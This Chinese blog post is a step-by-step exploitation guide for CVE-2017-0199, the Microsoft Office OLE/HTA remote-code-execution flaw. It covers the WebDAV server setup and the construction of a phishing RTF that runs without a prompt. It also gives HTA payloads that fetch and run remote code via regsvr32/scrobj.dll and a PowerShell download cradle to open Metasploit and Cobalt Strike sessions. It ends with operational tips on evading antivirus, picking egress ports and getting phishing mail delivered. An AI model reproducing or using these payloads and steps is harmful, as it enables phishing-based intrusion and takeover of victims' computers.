CVE-2017-0199详细利用过程

最新推荐文章于 2024-05-05 11:01:15 发布
最新推荐文章于 2024-05-05 11:01:15 发布
阅读量294 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31812157/article/details/130909546
版权

漏洞原理

该漏洞发生在嵌入链接对象时[即所谓的 OLE],大致的触发执行过程是这样的,当用户尝试点开一个包含此漏洞的 word 文档时,word 会根据之前嵌入好的链接对象自动向远程 web 服务器发起一个 HTTP 请求,而此请求实际上是去请 求一个 rtf 文件资源,之后 web 服务器则会根据自身的 mime 类型返回一个事先准备好的 RTF 文件,当第一次链接对象嵌入完成以后,我们接着再返回 web 服务器将此请求的 mime 改为 hta 类型,rtf 文件中的数据也改为恶意 hta 代码, 之后,当目标下次再打开 word 去请求时实际上就会返回一个 hta 文件了,而此时系统则会通过 COM 对象来查找能处理 application/hta 类型的程序,在 windows 中默认正好是使用 mshta.exe 去执行 hta 脚本,而恰巧这个 hta 脚本正 是我们早已精心准备好的 powershell 或者 vbs 的 payload,这才间接性的导致了我们 payload [ 专门用于加载远程的 shellcode(恶意代码) ]在远程目标机器上执行,其实,简单一句话概括如下

该漏洞利用 OFFICE OLE 对象链接技术,将包裹的恶意链接对象嵌在文档中,OFFICE 调用 URL Monike(COM 对象),将恶意链接指向的 HTA 文件下载到本地,URL Moniker 通过识别响应头中 content-type 的字段信息最后调用 mshta.exe 将下载到的 HTA 文件执行起来

什么是hta

其实,它就是一个用 html 写的简易系统程序,通过在 html 中嵌入<script>标签可以很方便的调用 windows 的各种系统工具来执行命令或者代码,所以至今仍被许多木马所滥用,他们本质上大都是借助此特性来触发执行恶意代码的

hta弹出计算器demo

<html>
<head>
 <script>
 k = new ActiveXObject("WScript.Shell"); 此处通过 WScript.Shell 组件来执行系统命令,很多 asp,aspx 代码中默认也都用的这个组件
 k.run("%windir%\\System32\\cmd.exe /c calc.exe", 0);
 window.close();
 </script>
</head>
</html>

rundll32.exe url.dll,OpenURL "C:\Users\11502\Desktop\calc.hta"

漏洞所影响到的 office 版本

Office 2007, Office 2010, Office 2013, Office 2016 本次用的 Office 2016 增强版

漏洞利用基础web环境搭建

安装好apache2 apt-get install apache2 -y

利用 a2enmod [ apache2 自带的模块管理工具 ] 启用 webdav 模块

# a2enmod dav
# a2enmod dav_fs
# a2enmod dav_lock
# a2enmod headers
# service apache2 restart
# netstat -tulnp | grep "80"

到 apache2 的 mime 配置文件中去添加 mime 的 rtf 类型

# vim /etc/apache2/mods-enabled/mime.conf
AddType application/rtf .rtf 注意,先添加 rtf 类型

而后,因为在上面已经事先启用了 webdav 模块,所以此处只需要把相应的配置写到 apache2 主配置文件中重启服务,即可开启 apache2 对 webdav 功能的支持,开启它主要是为了能接收外部的 PROPFIND 请求,防止第二次请求时出错

# vi /etc/apache2/apache2.conf
Dav on
# service apache2 restart

在160行左右

钓鱼文件构造

新建一个word文档

将其另存为rtf文件

把上面另存为的 rtf 文件传到自己 web 服务器的根目录下

# mv exploit-demo.rtf /var/www/html/
# ls /var/www/html/

此时访问rtf文件 并用 burpsuite 拦截该请求,观察返回的类型是否为 rtf,注意,此处必须返回 rtf 才行,不然在后面链接对象时可能会出错

如果返回结果不正常有很大几率是浏览器缓存的问题,清理一下缓存即可

而后继续编辑最开始的 exploit-demo.docx 文件 在插入栏下将其插入链接对象

这是插入之后的效果,多出来一模一样的内容

回到我们Linux上传的rtf文件 将其内容清空

cat /dev/null >exploit-demo.rtf

修改为如下内容

<script>
var a = new ActiveXObject("wscript.shell");
a.Run("%SystemRoot%\\system32\\calc.exe"); 注意,此处的 hta 只是暂时先简单的弹个计算器程序出来
</script>

去修改 apache2 的 mime 类型,把之前添加的 mime 的 rtf 类型改为hta

# vi /etc/apache2/mods-enabled/mime.conf
# AddType application/hta .rtf

再次抓包访问发现已经变成了hta

这时我们打开word,发现已经弹出了计算器

为了能让文件一打开就自动触发执行我们指定的恶意程序,还需要再次把 CVE-2017-0199-exploit-demo.docx 另存为 CVE-2017-0199-exploit.rtf 格式,然后用 notepadd++去编辑 CVE-2017-0199-exploit.rtf 文件,将 其中的\object\objautlink\rsltpict 全部替换为\object\objautlink\objupdate\rsltpict 而后保存,注意,有些杀软就会去识别 OLE 中是否包含有 objupdate 控件,如果有就进行拦截

目标只要打开不需要点yes就会触发

配合 Metasploit 实现 meterpreter 上线

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set srvport 8081
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.3.249
msf > set lport 1234
msf > exploit -j

将rtf内容替换为以下即可

<html>
<head>
<script>var c= 'regsvr32 /s /n /u /i:http://192.168.3.249:8081/XYQTheVbMAMNzp.sct scrobj.dll'; new ActiveXObject('WScript.She ll').Run(c,0);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

注,上面的 regsvr32 是一个注册动态链接库的命令行工具,通常都会被用来执行我们自己的各种恶意 payload,里面参数的具体含义如下

/s 静默执行
/n 指定不调用 DllRegisterServer,此选项须与/i 共用
/i 调用 DllInstall 将它传递到可选的[cmdline],在与/u 共同使用时,它调用 DllUnstall
/u 反注册控件

成功上线

洞配合 CobaltStrike 实现 beacon 上线

注意选择payload时不要勾选64位

将rtf改为以下内容

<html>
<head>
<script>var c= 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://*/readme\'))"'; new ActiveXObject('WScript.Shell').Run(c,0);</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

成功上线

关于自动化生成rtf的脚本

https://github.com/bhdresh/CVE-2017-0199 
# python2 cve-2017-0199_toolkit.py -M gen -w test.rtf -u http://192.168.0.104/test.rtf

关于在实战利用中自己的马或者 shell 不能正常上线的一些可能性

目标系统已经早已打好相应的漏洞补丁
目标机器在内网且根本无法正常访问外网,也就是说,根本没法下载自己远程的 payload 来反弹 shell,也就是说,因为无法正常连外网,马根本就上不了线
被目标的各种 ids / ips 设备侦测到了,阻断了 shell 的反向链接
所使用的 payload 或者马压根就不免杀,一上去就被对方杀软干掉了
用于发信的邮箱不靠谱,发过去可能就直接到对方垃圾箱了或者干脆根本就没到对方邮箱就被各种规则过滤掉了
目标邮箱可能已弃用,长时间没人看
被对方防护匹配到该漏洞利用样本或者其它敏感特征直接被拦掉
目标系统自身的问题,比如,某些兼容性问题...导致 word 执行异常或崩溃
如果自己用的是常规 tcp 马,马的回来端口尽量选择用一些穿透性相对比较好的,比如 25,110,53,80,443...如果直接用的隧道马,这些就没什么所谓了
K0e1y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-9810:Windows 64位上的CVE-2019-9810 Firefox的漏洞利用
02-04
Windows上的Firefox的CVE-2019-9810 Exploit CVE-2019-9810是在发现并利用的漏洞。 它影响MozillaJavaScript引擎Spidermonkey,并用于实现渲染器折衷。 此问题已在大约两个月前的修复。 问题概述 简而言之,该错误允许对检查边界进行冗余处理并进行了优化,从而使代码可以访问超出范围的内存。 问题本身在于Ion管道的Alias Analysis通行证。 下图突出显示了GVN优化过程中的错误(边界检查已被优化)通过的结果,如果您要查找的内容可以作为一个很好的总结: 但是,如果您想进一步了解它,我建议您看一看 。 组织 该存储库包
CVE-2017-0199利用:HTA处理程序漏洞
weixin_33699914的博客
09-19 387
本文讲的是CVE-2017-0199利用:HTA处理程序漏洞, FireEye最近记录了在Windows HTA处理程序中使用Office RTF文档在野外使用的0-day漏洞的攻击。 该漏洞随后被命名为CVE-2017-0199,并在2017年4月的Microsoft Update进行了修补。在任何样本或相关信息中都没有出现如何重现此漏洞的信息,但是...
CVE-2021-3560的漏洞说明及利用流程
smellycat000的专栏
07-20 3505
聚焦源代码安全,网罗国内外最新资讯!漏洞说明polkit是默认安装在很多Linux发行版上的系统服务。CVE-2021-3560是polkit中潜伏了7年之久的漏洞,于2021年6月份公...
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证 描述 特定于Apache Web服务器(httpd)的代码在将请求的路径与Apache Tomcat JK(mod_jk)连接器1.2.0至1.2.44中的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd公开了Tomcat支持的URL的子集,则特殊构造的请求可能会通过反向代理公开应用程序功能,而该功能不适用于客户端通过反向代理访问应用程序。在某些配置中,特殊构造的请求也有可能绕过httpd中配置的访问控制。尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod
CVE-2017-0199.zip
12-13
调试CVE-2017-0199漏洞样本过程中保存的中间文件,有兴趣的同学可以调试试试。强行添加摘要至50字。
CVE-2017-0199漏洞分析
一半西瓜的博客
04-17 4365
OFFICE OLE2LINK(CVE-2017-0199) 第一部分 OFFICE漏洞简介 1.1 微软office漏洞背景 1.2OFFICE OLE2LINK漏洞简介 第二部分 OFFICE OLE2LINK漏洞分析 2.1漏洞原理简单分析 2.2漏洞攻击原理简单图解 2.3相关知识介绍 第三部分 攻击代码分析 3.1 ms.rtf 3.2 配置文件 第四部分 利用复现过程 第五部分 攻击总结 参考资料
CVE-2017-0199——首个Microsoft Office RTF漏洞
weixin_34178244的博客
09-19 496
本文讲的是CVE-2017-0199——首个Microsoft Office RTF漏洞, FireEye最近检测到使用CVE-2017-0199漏洞的恶意Microsoft Office RTF文档,这是以前从未发现的漏洞。CVE-2017-0199漏洞发布日期为2017年4月11号,受影响系统包括: MicrosoftOffice2016 Mi...
CVE-2017-0199漏洞复现
fengeven的博客
01-14 253
CVE-2017-0199漏洞复现
漏洞CVE-2017-0199复现实验
qq_43443410的博客
07-21 826
  一名网络空间安全专业学生学习APT相关内容时所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教。 漏洞CVE-2017-0199复现实验1 概述1.1 漏洞背景1.2 漏洞简介2 复现实验3 可能导致失败的原因3.1 ActiveX被默认禁止执行hta程序3.2 其他问题 1 概述 1.1 漏洞背景   微软Office系列在世界范围内都是Windows甚至MacOs等操作系统上最常用的办公软件。而另一方面,利用Word、RTF、Excel等文档为载体进行攻击的方法层出不穷,一种非常流行.
网络空间安全——利用 CVE-2017-0213 提权
Jay
12-22 542
VE-2017-0213 是一个比较冷门的COM 类型混淆 (Type Confusion)漏洞。巧妙的利用该漏洞,可以实现本地的。以窗口(cmd)形式打开并执行命令查看一下现在权限whoami发现是system权限说明利用成功了。该漏洞由著名的Google Project zero 发现。利用 CVE-2017-0213 简单提权。利用 CVE-2017-0213 简单提权。-2017-0213漏洞简单提权,首先下载CVE-2017-0213。接下来创建一个用户试试吧!下面就简单演示一下利用
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
CVE-2019-0708漏洞 复现利用
热门推荐
nszmsjhshs的博客
03-09 1万+
这几天研究cve-2019-0708,一开始出错特别多而且只能把win7打成蓝屏,经过多次的更换靶机和攻击的试探最终功夫不负有心人,我利用cve-2020-0708终于拿到了win7的shell权限 演示步骤如下 靶机:win7旗舰版IP:192.168.220.151 攻击机:kali2021IP:192.168.220.148 靶机需要额外的内部环境配置,首先需要将靶机的防火墙关闭,其次将远程控制功能开启并允许所有机可以远程控制。然后将防火墙设置高级模式,在高级模式中的添加入站规则,设置新增端口3
逆向CVE-2017-0199漏洞样本
yellow的博客
12-13 799
遇到gamaredon组织攻击乌克兰的word样本,VT杀软大部分报CVE-2017-0199,也有说是word远程模板,非CVE-2017-0199漏洞,现在好奇到底是word远程模板还是CVE-2017-0199漏洞利用 先看gamaredon样本的行为,md5:b221647d110bd2be2c6e9c5d727ca8db是一个word文档,word.exe请求了http://micro...
初入渗透:CVE-2017-0199漏洞复现
qq_35538264的博客
03-30 1323
1:在 web根目录下/www : 创建一个1.rtf文件:附上代码 ;上是在kali中的服务; 在windows上创空的office;并在里面创建对象 , 这时候会生成一个有test789文字内嵌对象的文档,这是双击该对象只能以rtf文件方式打开对象,并不能执行hta脚本。因为生成对象的时候选中“链接到文件”,所以当打开对象的时候会去服务器上请求http://192.168.1.108/1.r...
CVE-2017-0199漏洞复现与研究
空旷在远方
09-22 6868
1引言 1.1微软office漏洞背景 微软Office系统软件(Word/Excel/PowerPoint等),一直是电脑上最为常用的办公软件之一,在国内外都拥有大量的用户。另一方面,利用Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段,广泛运用于APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将包含漏洞的文档伪装成为一个正常的Office文档,并精心构...
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
最新发布
NLOS的博客
05-05 436
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问题:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值